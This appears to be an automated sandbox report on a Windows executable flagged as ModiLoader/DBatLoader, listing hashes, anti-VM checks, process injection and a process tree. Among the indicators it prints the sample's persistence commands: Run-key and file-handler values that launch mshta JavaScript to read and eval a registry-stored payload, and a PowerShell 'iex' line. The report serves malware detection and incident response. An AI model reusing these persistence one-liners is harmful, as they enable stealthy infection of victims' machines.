Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-05-2024 03:16
Static task
static1
Behavioral task
behavioral1
Sample
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe
-
Size
320KB
-
MD5
1f4493c6c315bbc9277f1ad5e1e1953d
-
SHA1
e93c1fb21763138995b2a1d79c89924b0c829e23
-
SHA256
3fc6e9efa5bb4b7feb57f13f51bd5cd016e502e8947cc2f27abeb7ab2df31ce8
-
SHA512
1e19e47e826156b3f620c1fe879a1e9b51b9a6cab2e91862318094c8e7f498a8eaf9011f1490f7eda437073fe2d78ab70799dd03437e780c3247e95ff17e40bd
-
SSDEEP
6144:onhimZQWM3Ac7zfW2geZToVBkjM+jcBCvvU83FLOaTfVTjwo6:ohimZEQcX+2g0ToVBIcIvvU8dPG
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2512 2716 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 53 IoCs
Processes:
resource yara_rule behavioral1/memory/2216-12-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-13-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-10-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-6-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-8-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-4-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2216-17-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-18-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-15-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-16-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-14-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-19-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/2216-20-0x0000000001DE0000-0x0000000001EB6000-memory.dmp modiloader_stage2 behavioral1/memory/1940-29-0x00000000060E0000-0x00000000061B6000-memory.dmp modiloader_stage2 behavioral1/memory/1784-31-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-33-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1940-34-0x00000000060E0000-0x00000000061B6000-memory.dmp modiloader_stage2 behavioral1/memory/1784-38-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-35-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-41-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-36-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-44-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-37-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-48-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-39-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-40-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-43-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-42-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-46-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-52-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-74-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-66-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-65-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-67-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-64-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-63-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-62-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-57-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-56-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-55-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-54-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-53-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-51-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-50-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-49-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-47-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1784-45-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/2100-77-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 behavioral1/memory/2100-76-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 behavioral1/memory/2100-80-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 behavioral1/memory/2100-75-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 behavioral1/memory/2100-79-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 behavioral1/memory/2100-78-0x0000000000250000-0x0000000000391000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 1784 regsvr32.exe -
Drops startup file 1 IoCs
Processes:
regsvr32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:F8g7dgf=\"l2frMW06\";b2S0=new%20ActiveXObject(\"WScript.Shell\");dODq1wOm3=\"5BC\";LIQ0x=b2S0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\jvvo\\\\xbawnqo\");rb0UU=\"dFNFlkRB\";eval(LIQ0x);Ua5VyHA=\"0g8\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:fXX3eIK=\"I5\";yY6=new%20ActiveXObject(\"WScript.Shell\");csD9i5G=\"LTg\";VpcC76=yY6.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");nBx7e=\"PlwOntx4\";eval(VpcC76);U7TstC7=\"T13cL7M\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\529d1c\\1bcd8a.lnk\"" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exepowershell.exeregsvr32.exedescription pid process target process PID 1912 set thread context of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1940 set thread context of 1784 1940 powershell.exe regsvr32.exe PID 1784 set thread context of 2100 1784 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exeregsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:fAXhYKo89=\"m14k4yIE\";WK9=new ActiveXObject(\"WScript.Shell\");GpM3dv=\"v\";hlAU67=WK9.RegRead(\"HKCU\\\\software\\\\jvvo\\\\xbawnqo\");QBk5Yg0HH=\"V9\";eval(hlAU67);jh0wA8j=\"lft\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.cbe78f1\ = "ed42e7" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\ed42e7\shell regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe 1784 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 1940 powershell.exe 1784 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1940 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exemshta.exepowershell.exeregsvr32.exedescription pid process target process PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 1912 wrote to memory of 2216 1912 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe 1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe PID 2512 wrote to memory of 1940 2512 mshta.exe powershell.exe PID 2512 wrote to memory of 1940 2512 mshta.exe powershell.exe PID 2512 wrote to memory of 1940 2512 mshta.exe powershell.exe PID 2512 wrote to memory of 1940 2512 mshta.exe powershell.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1940 wrote to memory of 1784 1940 powershell.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe PID 1784 wrote to memory of 2100 1784 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\1f4493c6c315bbc9277f1ad5e1e1953d_JaffaCakes118.exe2⤵PID:2216
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:m3Tbh3="dMpnk5";F01H=new%20ActiveXObject("WScript.Shell");osq8xQ="GpdZ9S";RTV9I1=F01H.RegRead("HKLM\\software\\Wow6432Node\\EiMXRDav\\ZBIAdIM");VrqWeeg9="IRtj";eval(RTV9I1);gFDMNu9="dSSu";1⤵
- Process spawned unexpected child process
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xpcpm2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:2100
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
881B
MD566f141815a70dd94938f54490a6cb21d
SHA14615bdba8e80e4f04438ed1ba363510f15a25d00
SHA256ac06e7109ee99802be05d03e51b97b483ee627ce48bb69908424a9151fd33129
SHA51263cab3b4f6539ea8715ae65f9b0b2c702b20008aeeadd572dc607099e1c12f08e842130065d3fa0dde7b5ef71e7a196b4020a409a17bfc188ff0b9e200d89e42
-
Filesize
61B
MD57f145f9c460ee7bb55a3e7ad72a65f86
SHA139a73f2119c72ae27a166fff9ceb13859f6ac21b
SHA25616e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad
SHA5121bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f
-
Filesize
33KB
MD531a74cc3c704cbe8944c226fbedf1a2d
SHA1bfe74df136ebe86e474b77d485994c7aa791d60b
SHA2563a942d30a45ff6021fa92559381af77ec414347502a9d55b45732285ccc7b33b
SHA5127f9b3105aa4f7d37b2b6dd8bfe1c98570dd4efc0399772406d8e4e2ce40903690dd3be0fda4b62e487f7c760e8f7e891631c96106fb502eddbfd9395eb999128
-
Filesize
42KB
MD5a5023c4aba53181cc11d540e61d2ca61
SHA1a8c8e95495feba63618c7550b303d631643dbd85
SHA2563ec37de2c88a330d30cac07e12d4cda2b454352537c293bae55f8a7a25bb0f35
SHA512d6b46a6b8a6502c140cf457ed1a41fc13d97c4c9bfceb950fd201643d0e56718b39898170b72652a9d8f3530297f46e4586f0043bbed252f54f91a38ce4c10eb
-
Filesize
991B
MD548c37ed818e3e1b986f0e65de0abb48d
SHA161b0b3bb1018c09543c0d3f37ec8458dc0434432
SHA256945cbd049408f030e3d7439aa896370ee8a8e1c20ecbb682e40b2d30288e3902
SHA5128ad5426187a832409cefc9964022ed792160f68b9dfb0611ce42980fb90b6663070cffb502df41db64a93486469107511095f83a26d1018ad4003d51efe26a41